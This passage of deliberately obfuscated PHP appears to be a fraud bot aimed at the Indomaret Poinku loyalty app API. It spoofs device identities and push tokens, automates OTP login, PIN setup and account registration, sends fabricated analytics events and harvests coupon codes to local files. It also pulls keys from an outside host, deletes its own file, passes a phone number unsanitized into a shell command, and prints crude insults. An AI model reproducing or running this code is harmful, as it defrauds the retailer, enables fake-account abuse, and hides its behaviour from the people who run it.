  $wDisp = "{"customerGameId":"" . $ypyz5 . ""}"; 
  goto Ys25d; 
  Uj8_1: 
  KIJlA: 
  goto d3fM_; 
  nTwzh: 
  echo "
"; 
  goto Aj6dX; 
  qgKwQ: 
  echo "\xa"; 
  goto x3rSv; 
  vEGl4: 
  $WtCiL = @$Ap1KM["data"]["couponCode"]; 
  goto Cfvqe; 
  M6fNa: 
  echo @zM6Ic("green", "Nomor HP Anda : "); 
  goto bOrHs; 
  ozeA_: 
  $yeprB = g1wxt("https://edtsapp.indomaretpoinku.com/notification/apix-1502-api/push-notifications/fcm-registration", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto oopdK; 
  U1R2H: 
  $jTEU0++; 
  goto gUQAz; 
  W0caM: 
  $w5ulg = str_replace("
", '', $TvVlh); 
  goto P08e3; 
  rIaU9: 
  if (!($fUekS == '')) { 
    goto gp62g; 
  } 
  goto wRkJh; 
  riEyv: 
  $Y_a4j = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinkey")); 
  goto X0B6J; 
  zFn3e: 
  $IBJ55 = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinnew")); 
  goto NBKuI; 
  NOg5t: 
  e1oJO: 
  goto gGSXs; 
  Eko9L: 
  if (!($cPDPt == 10)) { 
    goto XfMNS; 
  } 
  goto gFeB4; 
  xxJd7: 
  RHrij("Kupon Poinku new.txt", $GTMYQ); 
  goto kvyId; 
  IuO51: 
  echo @zM6Ic("yellow", "Build By FERDY RAMADHAN "); 
  goto jm8QN; 
  KCcRM: 
  JgrhB: 
  goto cCvz0; 
  UuPZd: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto kGfGw; 
  GdJUg: 
  echo @ZM6IC("nevy", $t2tnx); 
  goto hp69C; 
  twQoz: 
  echo @ZM6ic("yellow", "Kode Kuponnya  : "); 
  goto JtIVc; 
  k7huS: 
  goto MLXaN; 
  goto padaL; 
  PuPZU: 
  $aoIfK = @file_get_contents("more"); 
  goto JBjpK; 
  hMWAZ: 
  $YE0oY = g1WxT("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/check-device", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto J9oHK; 
  Cfvqe: 
  $LgiFv = @$Ap1KM["data"]["information"]; 
  goto XDKb2; 
  LCYe1: 
  echo "Mulai Baris Ke : "; 
  goto gmo6i; 
  TSJ4g: 
  goto j7pkX; 
  goto cYcM8; 
  MIRP3: 
  echo @zm6IC("nevy", "Akun Ke    : "); 
  goto m5ULx; 
  wstM7: 
  echo @ZM6ic("nevy", $ldzeo); 
  goto JATu9; 
  wHuxC: 
  die; 
  goto BOv0N; 
  xgNd2: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto iv9jW; 
  zAu8b: 
  echo @Zm6iC("green", "Postal Code  : "); 
  goto DJjdR; 
  jqBDn: 
  echo @ZM6iC("nevy", $pugmZ); 
  goto Oe2Q8; 
  gsqDa: 
  $a7K8a = JLw7P("https://firebaseinstallations.googleapis.com/v1/projects/idm-corp-prd/installations", $wDisp); 
  goto tyzFG; 
  OaVT1: 
  $PQA77 = $OtngW; 
  goto ejx25; 
  YVULM: 
  $z4sxX = @$lImQC["data"]["content"][7]["couponName"]; 
  goto lCoM2; 
  tmuK2: 
  $ZNU2M = @$Ap1KM["data"]["couponName"]; 
  goto fdNlj; 
  HTPsC: 
  p1VdQ: 
  goto xfpgA; 
  BqavN: 
  vFJdm: 
  goto cgMr9; 
  eXFTh: 
  $XDyMm = G8pF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons/has-new-coupon", $aY0el, $GOXkU, $mlMLt); 
  goto IgHJm; 
  f4TNt: 
  $ABmxY = @$owfHy["message"]; 
  goto mTnnn; 
  kAmOU: 
  $wdxee = @$owfHy["data"]["content"][$dQ8Tp]["exchangeStartDate"]; 
  goto x31ij; 
  UPPZ2: 
  echo "\xa"; 
  goto HjmuJ; 
  E1znw: 
  echo @ZM6Ic("red", "Yah... Ayam Nya Ga Ada , Cek Kembali Nanti..."); 
  goto KBFjt; 
  ja9Xm: 
  @unlink("poinhp.php"); 
  goto K23sE; 
  YISeP: 
  $aY0el = $v1ZMX; 
  goto gakRU; 
  OA4m1: 
  BuRXH: 
  goto dgajK; 
  Rfnnj: 
  $UHj7C = G8PF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto FOVdB; 
  E67WH: 
  WCMhM: 
  goto MR7en; 
  UfDTf: 
  echo @ZM6IC("nevy", "        AAMIIN "); 
  goto TAwyA; 
  oeQpn: 
  @unlink("poinhp.php"); 
  goto P07mA; 
  tw645: 
  cEejp: 
  goto A1QGS; 
  hwdtM: 
  echo "
"; 
  goto IpDdv; 
  H8iZh: 
  goto lPFhp; 
  goto HCWyL; 
  kJKzo: 
  echo "
"; 
  goto lkfTM; 
  Od3xN: 
  $ogbF4 = "10000000"; 
  goto xuF8a; 
  oH2Jv: 
  echo @ZM6iC("yellow", " 6 . Regist Poinku Otomatis
"); 
  goto yB2Vl; 
  wWuTM: 
  echo "
"; 
  goto gZGkC; 
  GgFfz: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","otp":"" . $hdCXp . "","deviceId":"" . $aY0el . ""}"; 
  goto iBHNa; 
  evno_: 
  $zy8D_ = curl_exec($C6npe); 
  goto ZiXgl; 
  o1wNp: 
  $eqo_P = @file_get_contents("whoami"); 
  goto TJT6Y; 
  Rew81: 
  r9C2_: 
  goto tmzrq; 
  mfo7m: 
  $yy9BI++; 
  goto EoL_9; 
  bQaVk: 
  echo @zm6IC("red", $D2zwh); 
  goto P7yvx; 
  dXHQv: 
  $zcN5u = xOZB4(array("|"), $tqWr2)[0]; 
  goto APlFW; 
  caGhK: 
  echo "\xa"; 
  goto QFkzP; 
  Y_om6: 
  if (!($rVPVc == '')) { 
    goto xbrV2; 
  } 
  goto nw32r; 
  YhnL7: 
  echo "
"; 
  goto zX3Pb; 
  ZAvo0: 
  $JrTpE = @$owfHy["data"][0]["district"]["city"]; 
  goto Vy0Lw; 
  bfEta: 
  @unlink("poinhp.php"); 
  goto MfNSg; 
  bY0qY: 
  die; 
  goto LOrcr; 
  yJoIl: 
  echo "\xa"; 
  goto WjCv6; 
  eMmIj: 
  $ldzeo = @$owfHy["data"][$qtgR3]["subDistrict"]; 
  goto p12qk; 
  tHryq: 
  echo @zM6Ic("yellow", "Nama Kuponnya  : "); 
  goto JgUFe; 
  EtUWZ: 
  goto hJDqH; 
  goto DaBwG; 
  v1iyI: 
  goto Gq2T9; 
  goto T8xTD; 
  RnlCl: 
  $Ap1KM = json_decode($N0XGD, true); 
  goto o0dYP; 
  adaDT: 
  echo "
"; 
  goto XAUCG; 
  IrsDs: 
  $GOXkU = "Xiaomi Redmi 5 Plus"; 
  goto IxSOI; 
  N1Fy0: 
  $gIJCo = xuUln($PGTBJ); 
  goto vCHP8; 
  XuYvJ: 
  goto GGXBW; 
  goto hijh7; 
  dEqiK: 
  CtCqn: 
  goto QjFYm; 
  TT_2Q: 
  $odGGi = $kCT0W . "mbLQpe"; 
  goto XALsS; 
  naE5z: 
  echo @zM6ic("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto s74NK; 
  cs8L7: 
  $k1y0B = G1wXT("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/remove-isaku-token", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto Qb11N; 
  XJjoI: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $zn5zd . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto msggy; 
  O32m7: 
  echo @ZM6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto ktRki; 
  La4zp: 
  echo @Zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto NN42U; 
  wea5J: 
  if (!($cPDPt == 14)) { 
    goto CtCqn; 
  } 
  goto uiAfq; 
  wfRVl: 
  vd_Oz: 
  goto YfMdd; 
  Wh127: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto T3KRP; 
  a2iK3: 
  $Y02JS = g1wxT("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/pin/create-pin", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto UWuvP; 
  iBHNa: 
  $o0WQD = tHHFs("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/login-verification-sms", $wDisp, $aY0el, $GOXkU); 
  goto uC_Nz; 
  er8dK: 
  GsrX0: 
  goto cDMKA; 
  CmfSI: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto dVtXf; 
  U90Ts: 
  $N0XGD = G8pF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto UVPhM; 
  uBAdz: 
  $wDisp = ''; 
  goto Q2XZ7; 
  w3RTq: 
  goto OQhff; 
  goto El078; 
  utKOm: 
  OfySH: 
  goto wboPA; 
  D1bz3: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto u7PIe; 
  TvoFq: 
  echo "\xa"; 
  goto XH7hS; 
  Wbb1K: 
  $KOeAA = @$Ap1KM["data"]["rewards"][0]["item"][0]["couponMasterId"]; 
  goto POBf_; 
  lU4d2: 
  $DxrJr = "100000000000000000"; 
  goto wWIIC; 
  N2c3X: 
  $PQA77 = $OtngW; 
  goto arWms; 
  R1iG3: 
  aL7ye("whoami", $qaGLY); 
  goto g06r9; 
  Vy9X8: 
  K8wp5: 
  goto eQs6x; 
  FYzej: 
  $owfHy = json_decode($XTuz1, true); 
  goto SRJRA; 
  smjuE: 
  $GOXkU = $w5ulg; 
  goto Phh63; 
  XzOoE: 
  echo "\xa"; 
  goto FOA_7; 
  TpXcJ: 
  echo @zM6Ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto mTXKJ; 
  ZyY5B: 
  echo "
"; 
  goto kaBU8; 
  sx31h: 
  $ZdrCv = rand(10, 99); 
  goto s7q36; 
  BdILS: 
  $U0YgX = str_replace("\xd", '', $zcN5u); 
  goto o4gad; 
  VpqjY: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto ejeA7; 
  uZqPO: 
  $wDisp = "{"userId":" . $R_bYC . ","deviceType":"01","deviceId":"" . $aY0el . "","fcmToken":"" . $WYrgv . ":APA91bFt9WuOdnYit_hOvqmHC2uMGiiCwp_u8JgO0kB3sgYQNxoWqO57EEYpAAAVjjDCY8C4j-ePHCYG6Mgcg85RehNO33xt1RRP6DIPVu36qkFHdkfQ9GeTDH8WFrSaiiBzkeZGm9wp"}"; 
  goto Dy0BU; 
  JCfF7: 
  function rhrIJ($FK_yc, $bQedf) 
  { 
    goto qRnqQ; 
    qRnqQ: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto gn4_b; 
    xjruV: 
    fclose($FhLCi); 
    goto h9Bfx; 
    gn4_b: 
    fputs($FhLCi, "{$bQedf}
"); 
    goto xjruV; 
    h9Bfx: 
  } 
  goto bnBRa; 
  H1hXk: 
  pj0Fz: 
  goto rTj5S; 
  EyI4f: 
  if ($ZNU2M == '') { 
    goto k0XKX; 
  } 
  goto OG_cq; 
  IVMnN: 
  echo "\xa"; 
  goto K3Pk1; 
  jQcSk: 
  $b2ucB = @$owfHy["data"][0]["district"]["cityName"]; 
  goto Viphl; 
  FMSSY: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto QNKX2; 
  pjVQI: 
  goto BGNon; 
  goto rrrlO; 
  X8Xws: 
  echo "
"; 
  goto B0rL2; 
  tsqUz: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto mA_cS; 
  yz1R8: 
  $mF_0D = @$lImQC["data"]["content"][10]["couponName"]; 
  goto cjkQZ; 
  YRlTm: 
  $ofEkP = zFEbK("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me/protections/enable", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto Z8K7v; 
  qmoFr: 
  $zn5zd = $U0YgX; 
  goto vAFZI; 
  kQVj5: 
  $Jk9cx = g8PF2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/sy-app-version/get-version-key/ANDROID", $aY0el, $GOXkU, $mlMLt); 
  goto AvLYy; 
  qhkai: 
  $obc_G = str_replace("
", '', $wlJRC); 
  goto N6c5f; 
  s7gJN: 
  echo @zM6ic("yellow", "Pesan       : "); 
  goto E9X9M; 
  yr7dZ: 
  LL91e: 
  goto kQVj5; 
  jSY81: 
  $a7K8a = jLw7P("https://firebaseinstallations.googleapis.com/v1/projects/idm-corp-prd/installations", $wDisp); 
  goto ZP0KW; 
  zEKm4: 
  echo @zm6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto rgtEh; 
  t4bTU: 
  echo "
"; 
  goto vxIYx; 
  cf3yC: 
  echo "
"; 
  goto qifxP; 
  cJ3ec: 
  echo $yy9BI . ". "; 
  goto XC7On; 
  PnS2d: 
  $zcN5u = xOzb4(array("|"), $wZnHP)[0]; 
  goto rihYD; 
  mtJDK: 
  $fZ2bz = @$owfHy["message"]; 
  goto ubh_u; 
  TCxB8: 
  function by5Cp($FK_yc, $Ev2_i) 
  { 
    goto VC4mI; 
    ppN5y: 
    fputs($FhLCi, "{$Ev2_i}
"); 
    goto KFarS; 
    KFarS: 
    fclose($FhLCi); 
    goto dWpq7; 
    VC4mI: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto ppN5y; 
    dWpq7: 
  } 
  goto NLUGX; 
  YDCaX: 
  $mlMLt = $obc_G; 
  goto VNXZA; 
  BanQZ: 
  if (!($L1qpJ == '')) { 
    goto awvwA; 
  } 
  goto SPzsL; 
  iOMaV: 
  nGOmL: 
  goto n1eQD; 
  spPk5: 
  echo "\xa
"; 
  goto CXbu3; 
  HzylY: 
  goto zYvyA; 
  goto KEsk1; 
  Amtsw: 
  echo @zM6iC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto bwQ3Z; 
  xGjbC: 
  if (!($fUekS == '')) { 
    goto LL91e; 
  } 
  goto i_i2N; 
  nL9dQ: 
  echo @zm6Ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto c5Fn9; 
  rTj5S: 
  if (!($jTEU0 < $S8W9D)) { 
    goto N1kWv; 
  } 
  goto qybIO; 
  Y2z6Q: 
  VS3Km: 
  goto IQ9ZU; 
  CC5qC: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto u7stb; 
  aGFhl: 
  $wDisp = "{"city":" . $JrTpE . ","cityName":"" . $b2ucB . "","district":" . $L1qpJ . ","districtName":"" . $yJiD4 . "","keyword":"" . $ZqwwP . "","province":" . $Ipl73 . ","provinceName":"" . $K4tCB . ""}"; 
  goto oPTCR; 
  gA4yc: 
  function bLHdG($FK_yc, $SR3ui) 
  { 
    goto f60TA; 
    sCGc2: 
    fputs($FhLCi, "{$SR3ui}\xa"); 
    goto PYtPK; 
    PYtPK: 
    fclose($FhLCi); 
    goto RDsum; 
    f60TA: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto sCGc2; 
    RDsum: 
  } 
  goto HqWju; 
  ZVH0z: 
  echo @zM6IC("nevy", $POIN9); 
  goto cirbZ; 
  cGhEP: 
  die; 
  goto c0aES; 
  vRmvG: 
  $oNl8L = explode("\xa", @file_get_contents("GRATIS Indomie Mi Goreng!.txt")); 
  goto YgdMG; 
  qi7k2: 
  echo "
"; 
  goto MBfiO; 
  Ik2ui: 
  echo "\xa"; 
  goto LhKCM; 
  oujxp: 
  if (!($fUekS == '')) { 
    goto PlP0m; 
  } 
  goto vUkxr; 
  gT8Sy: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto SZx7v; 
  oBJ1a: 
  Jrt89: 
  goto dem36; 
  kRYuQ: 
  if (!($jTEU0 < $S8W9D)) { 
    goto cdHjV; 
  } 
  goto UOMa8; 
  vfw77: 
  $zvt88 = $QRhbE; 
  goto e08Bo; 
  rnY5C: 
  $Jk9cx = g8pF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto L84Hz; 
  chQyH: 
  $YXsOG = @$Ap1KM["message"]; 
  goto nu_T_; 
  TU0CC: 
  echo @zM6ic("yellow", "Nama Stamp  : "); 
  goto dYic0; 
  Zv9qP: 
  i5Ayp: 
  goto H6DgW; 
  DgJtQ: 
  $zn5zd = $U0YgX; 
  goto QIpsV; 
  Dys8M: 
  echo "
"; 
  goto iFBZv; 
  n8X_y: 
  if (!($jTEU0 < $S8W9D)) { 
    goto Tr9Br; 
  } 
  goto n9Eeq; 
  VyZs8: 
  goto EHIPK; 
  goto OIj3S; 
  ZZutb: 
  echo @zm6IC("green", "Ada Ayam... Yuk Pecahin !!"); 
  goto F_jim; 
  Rmpkm: 
  $JrTpE = @$owfHy["data"][0]["district"]["city"]; 
  goto jQcSk; 
  qGMyQ: 
  echo @zM6iC("nevy", $J0Fkh - $yWjvE); 
  goto R6OFx; 
  MugIV: 
  m4_o3: 
  goto CStpJ; 
  xSVo5: 
  echo "
"; 
  goto rvC9u; 
  fj_AT: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto mDHN7; 
  Hd7NT: 
  BOYRi: 
  goto NOg5t; 
  t5Qik: 
  $yy9BI = "0"; 
  goto qVcUC; 
  oopdK: 
  $nb9cm = round(microtime(true) * 1000); 
  goto y5Csz; 
  SleGX: 
  if (!($cPDPt == 8)) { 
    goto ViQzv; 
  } 
  goto TIpPO; 
  oE54j: 
  @unlink("poinhp.php"); 
  goto y4a0t; 
  BgRSC: 
  echo "
"; 
  goto cCVTp; 
  GC82h: 
  function aL7YE($cF6mU, $a3qxo) 
  { 
    goto EDEvC; 
    yebJ4: 
    fclose($JZH8K); 
    goto e3Z2Q; 
    oTm1Y: 
    fputs($JZH8K, $a3qxo); 
    goto yebJ4; 
    EDEvC: 
    $JZH8K = fopen($cF6mU, "a"); 
    goto oTm1Y; 
    e3Z2Q: 
  } 
  goto k0G65; 
  LVnAQ: 
  $lbuGr = @$lImQC["data"]["content"][0]["couponCode"]; 
  goto MB1KJ; 
  CotX3: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto Z3K8e; 
  gakRU: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto mUS4h; 
  IwEkL: 
  jj5YO: 
  goto NTjXY; 
  hq6Mn: 
  cz23r: 
  goto mvNd_; 
  SD9A7: 
  $nb9cm = round(microtime(true) * 1000); 
  goto vL07C; 
  kAu4G: 
  echo "
"; 
  goto jrpYt; 
  Ja0J8: 
  echo "
"; 
  goto bpPTo; 
  n1CDj: 
  $zcN5u = XoZb4(array("|"), $tqWr2)[0]; 
  goto jcyDG; 
  IVQjo: 
  goto ectyt; 
  goto YyGNN; 
  Ww5hz: 
  $Pud0o = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinkey")); 
  goto zx7fS; 
  CStpJ: 
  if (!($cPDPt == 6)) { 
    goto vh7kR; 
  } 
  goto asbF8; 
  hx1RQ: 
  $wDisp = "{"address":"" . $hGkCN . "","addressName":"Rumah","district":{"city":" . $JrTpE . ","cityName":"" . $b2ucB . "","district":" . $L1qpJ . ","districtName":"" . $yJiD4 . "","keyword":"" . $ZqwwP . "","province":" . $Ipl73 . ","provinceName":"" . $K4tCB . ""},"id":0,"isPrimary":false,"postalCode":{"postalCode":"" . $Bz8Et . "","postalCodeId":"" . $pugmZ . ""},"recipientEmail":"" . $z6UZd . "","recipientName":"" . $m_IIo . "","recipientPhoneNumber":"" . $qFy6r . "","subDistrict":{"subDistrict":"" . $ldzeo . "","subDistrictCode":"" . $U_EVz . "","value":"" . $xzAuu . ""}}"; 
  goto Aq2AZ; 
  THkHS: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto lNj3J; 
  fNde0: 
  echo "
"; 
  goto oo0u7; 
  f0Msa: 
  echo @zm6IC("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto uWZ9j; 
  ZImQQ: 
  echo "\xa"; 
  goto kWk_Z; 
  OZZQb: 
  if (!($fM3_G < $bDQe4)) { 
    goto wB2V7; 
  } 
  goto IYPI4; 
  OYBJA: 
  echo "\xa"; 
  goto UHSQH; 
  R3mvs: 
  echo @zM6ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto VhWc9; 
  dnHEW: 
  echo "\xa"; 
  goto u_gnn; 
  ig8Qg: 
  goto nGOmL; 
  goto t0FCe; 
  eef1h: 
  echo "
"; 
  goto GpGXd; 
  DXT4R: 
  $mlMLt = $obc_G; 
  goto m5lTp; 
  FbFtW: 
  HQc4z: 
  goto Gaiy0; 
  KWjZ5: 
  $DxrJr = "100000000000000000"; 
  goto kOQHI; 
  CDtUL: 
  $e0XZt = @$owfHy["data"]["content"][$qtgR3]["id"]; 
  goto TcT6g; 
  CfJPM: 
  $qq5tL = "2" . $gYG6P . "hg5454d21vc"; 
  goto F0Fjz; 
  GysqL: 
  die; 
  goto R30MJ; 
  UAANB: 
  $zvt88 = $QRhbE; 
  goto vwrtA; 
  okBv5: 
  echo @Zm6IC("red", "Notice : "); 
  goto nabnt; 
  TbEJQ: 
  $xT15V = G8PF2("https://edtsapp.indomaretpoinku.com/%2Floyalty%2Fapix-1502-api%2Fmobile%2Fcoins%2Fprizes%2FGOFRESH2022%2Fme", $aY0el, $GOXkU, $mlMLt); 
  goto RTSxC; 
  ptHr2: 
  echo @ZM6iC("blue", "[5] {$NFC6_} 
   > {$QFiev} 

"); 
  goto Huujv; 
  PgKtP: 
  Q_Hza: 
  goto UOEEY; 
  eFzZO: 
  echo "\xa"; 
  goto vKN4h; 
  DrapX: 
  echo "
"; 
  goto GHKYD; 
  Fhrtw: 
  $yy9BI; 
  goto EqnUK; 
  UCeyR: 
  $ZXjwY = @$owfHy["data"]["content"][0]["name"]; 
  goto YBcmP; 
  w85Q2: 
  goto EPpoD; 
  goto plK7Z; 
  ID5xm: 
  goto tZ3WW; 
  goto i9Vur; 
  eEiFq: 
  $lPULW = $m0f8X; 
  goto D1bz3; 
  f28cg: 
  $u35jw = count($m0f8X) - 1; 
  goto eEiFq; 
  NlZns: 
  qve7i: 
  goto souSV; 
  Sfw_J: 
  echo @zM6ic("green", $wd9cN); 
  goto uMLhp; 
  I_qlq: 
  $aY0el = $v1ZMX; 
  goto DkdVG; 
  DWoKo: 
  $b2ucB = @$owfHy["data"][$dQ8Tp]["cityName"]; 
  goto zMUhZ; 
  WQ2iB: 
  echo @zM6IC("nevy", $ZNU2M); 
  goto HELh_; 
  rFpmU: 
  $zcN5u = xOzb4(array("|"), $tqWr2)[0]; 
  goto sJENN; 
  ZCeM4: 
  $zvt88 = $QRhbE; 
  goto bb1uz; 
  EpWcu: 
  goto H2PPC; 
  goto rUsk1; 
  N_7zY: 
  echo "Mulai Baris Ke : "; 
  goto VW1_y; 
  RixsK: 
  $zvt88 = $QRhbE; 
  goto tDjzB; 
  Mfr2v: 
  echo "\xa"; 
  goto jZrJF; 
  zt4XJ: 
  @unlink("poinhp.php"); 
  goto n3Ac7; 
  LtRQg: 
  echo @ZM6IC("green", "Nomor  : "); 
  goto fp_Tv; 
  MVc4v: 
  UNJKH: 
  goto QmHCB; 
  uB3zb: 
  $I2tFV = @$owfHy["data"]["content"][$dQ8Tp]["amount"]; 
  goto vGgFB; 
  yvQpH: 
  echo @ZM6ic("yellow", "Postal Code ID : "); 
  goto zznCp; 
  RQ7nA: 
  $BW_8H = @$owfHy["data"]["content"][$fM3_G]["description"]; 
  goto w2SfP; 
  yHDsJ: 
  $obc_G = str_replace("
", '', $wlJRC); 
  goto YDCaX; 
  HFm0t: 
  $gwQ0n = @$lImQC["data"]["content"][17]["couponCode"]; 
  goto NZ3S6; 
  KzC24: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto YXEEi; 
  uwvBF: 
  echo @Zm6iC("nevy", $ZNU2M); 
  goto adaDT; 
  vL07C: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"home","page_urlpath":""},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto QyKc9; 
  MYIE1: 
  echo "\xa"; 
  goto tX5nR; 
  zUdc1: 
  @unlink("poinhp.php"); 
  goto RmmjO; 
  q2w4c: 
  echo @Zm6IC("nevy", "        AAMIIN "); 
  goto Amtsw; 
  q9O2O: 
  $zcN5u = XoZB4(array("|"), $wZnHP)[0]; 
  goto jhlg7; 
  iosF0: 
  echo @ZM6Ic("green", "Nomor HP Anda : "); 
  goto Arsu5; 
  PwA2q: 
  @unlink("poinhp.php"); 
  goto jG_Zk; 
  i9qNy: 
  goto KIJlA; 
  goto ALS0m; 
  x1zmG: 
  @unlink("poinhp.php"); 
  goto be733; 
  dTj8e: 
  echo @ZM6IC("yellow", "Poin Akun Anda : "); 
  goto AMOyM; 
  e5JB2: 
  $wDisp = "{"couponId":"" . $Qa1_P . "","qty":1.0,"stampExchangeId":"" . $gCIzy . "","deliveryAddressItem":{"address":"" . $YUfPv . "","addressName":"" . $YUfPv . "","district":{"city":" . $JrTpE . ","cityName":"" . $b2ucB . "","district":" . $L1qpJ . ","districtName":"" . $yJiD4 . "","keyword":"" . $ZqwwP . "","province":" . $Ipl73 . ","provinceName":"" . $K4tCB . ""},"id":" . $D18xv . ","isPrimary":true,"postalCode":{"postalCode":"" . $Bz8Et . "","postalCodeId":"" . $pugmZ . ""},"recipientEmail":"" . $SD3v6 . "","recipientName":"" . $CeRgl . "","recipientPhoneNumber":"" . $t2tnx . "","subDistrict":{"subDistrict":"" . $ldzeo . "","subDistrictCode":"" . $U_EVz . "","value":"" . $xzAuu . ""}}}"; 
  goto Xuq79; 
  OA0KP: 
  die; 
  goto PgKtP; 
  EdVpX: 
  @unlink("poinhp.php"); 
  goto HcczB; 
  KyXoa: 
  @unlink("poinhp.php"); 
  goto oE54j; 
  KC4mw: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto wEyFg; 
  PPwSO: 
  die; 
  goto Dv40u; 
  YDdPQ: 
  $mlMLt = $obc_G; 
  goto N1cO9; 
  A0jWl: 
  ZJW8G: 
  goto a0Fb7; 
  fe9xE: 
  echo @zm6Ic("nevy", $ZNU2M); 
  goto gwkL_; 
  hwskv: 
  echo "\xa"; 
  goto WE5C6; 
  nTV_R: 
  @unlink("poinhp.php"); 
  goto pVd1W; 
  rEF_Z: 
  $zvt88 = $QRhbE; 
  goto BFumN; 
  DH8Tf: 
  $lPULW = $m0f8X; 
  goto MAR0t; 
  BQie2: 
  echo "
"; 
  goto FEUU4; 
  AHwgY: 
  echo @zM6IC("yellow", "Akhir Penukaran : "); 
  goto K_dMT; 
  FpT14: 
  $u35jw = count($m0f8X) - 1; 
  goto QebCh; 
  tSM8m: 
  $earOL = $sONlZ; 
  goto qJxBN; 
  UITj3: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"Stamp detail","page_urlpath":""},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto vkYxU; 
  LFnhV: 
  echo @Zm6IC("green", $LgiFv); 
  goto M4L5M; 
  MQEh3: 
  iwC6F: 
  goto kspMc; 
  l1S9t: 
  $ZdrCv = rand(10, 99); 
  goto E94Xn; 
  rOLXX: 
  $u35jw = count($m0f8X) - 1; 
  goto DH8Tf; 
  rzYSV: 
  $DxrJr = "100000000000000000"; 
  goto ty2v1; 
  Qvm57: 
  echo "\xa"; 
  goto qPkmL; 
  JHJAr: 
  echo "\xa"; 
  goto t9SxY; 
  tzlNv: 
  echo @zM6Ic("nevy", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto jFUK6; 
  gy5bR: 
  echo @Zm6IC("green", "Masukkan Nomor Anda    : "); 
  goto obQ7N; 
  tAwBR: 
  echo @zm6Ic("nevy", "        AAMIIN "); 
  goto eOGWf; 
  TDRtd: 
  die; 
  goto hq6Mn; 
  tDjzB: 
  echo "
"; 
  goto rPYX1; 
  wOHaA: 
  $Ap1KM = json_decode($ofEkP, true); 
  goto zcO32; 
  yyrGC: 
  echo "\xa"; 
  goto A1ij4; 
  QFkzP: 
  $xp_1p = "klik.txt"; 
  goto rNvLE; 
  Adzo6: 
  $m5BZY = ggGr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto LAo4A; 
  A42_x: 
  echo "
"; 
